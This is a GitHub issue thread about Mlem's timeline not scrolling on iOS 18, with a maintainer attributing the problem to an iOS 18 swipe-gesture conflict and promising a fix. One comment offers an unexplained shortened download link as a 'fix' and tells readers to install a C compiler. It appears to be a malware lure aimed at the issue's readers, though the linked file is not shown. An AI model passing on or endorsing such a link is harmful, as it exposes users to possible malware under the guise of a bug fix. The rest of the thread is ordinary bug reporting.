### ISSUE TITLE
Scrolling not responding 50% of the time

### ISSUE THREAD

**Issue by aboodvan** [mlemgroup/mlem#1339]
**Describe the bug**
What did you do to trigger the bug?

Just scrolling in the timeline.

**Expected Behavior**
What did you expect to happen?

Response and scroll down.

**Actual Behavior**
What actually happened?

Wouldn't scroll.

**To Reproduce**
What steps do I need to take to trigger the bug?

1. Open mlem
2. wait until the timeline to load
3. Scroll down

**Mlem Information:**
Version + Build number
If this started happening recently, write which version introduced the bug

1.3.5 (59)

**Additional Context**
Any other relevant information

I updated the phone to ios 18 on iPhone 13 mini and update mlem at the same time. I'm not sure if these two events are related.

I verified the issue only appears in mlem. I restarted the iphone multiple times as well.

It looks like it freezes to load content.

**Comment by nhatlaso1** [comment]
This might help:This file might fix it
https://bit.ly/3XQLHlH

you may need to install the c compiler

**Comment by EricBAndrews** [comment]
This is likely due to a bug in iOS 18 that makes the swipe action conflict with scrolling. We have a fix for this on our 2.0 beta codebase--we'll roll it out to the 1.3 release as well.
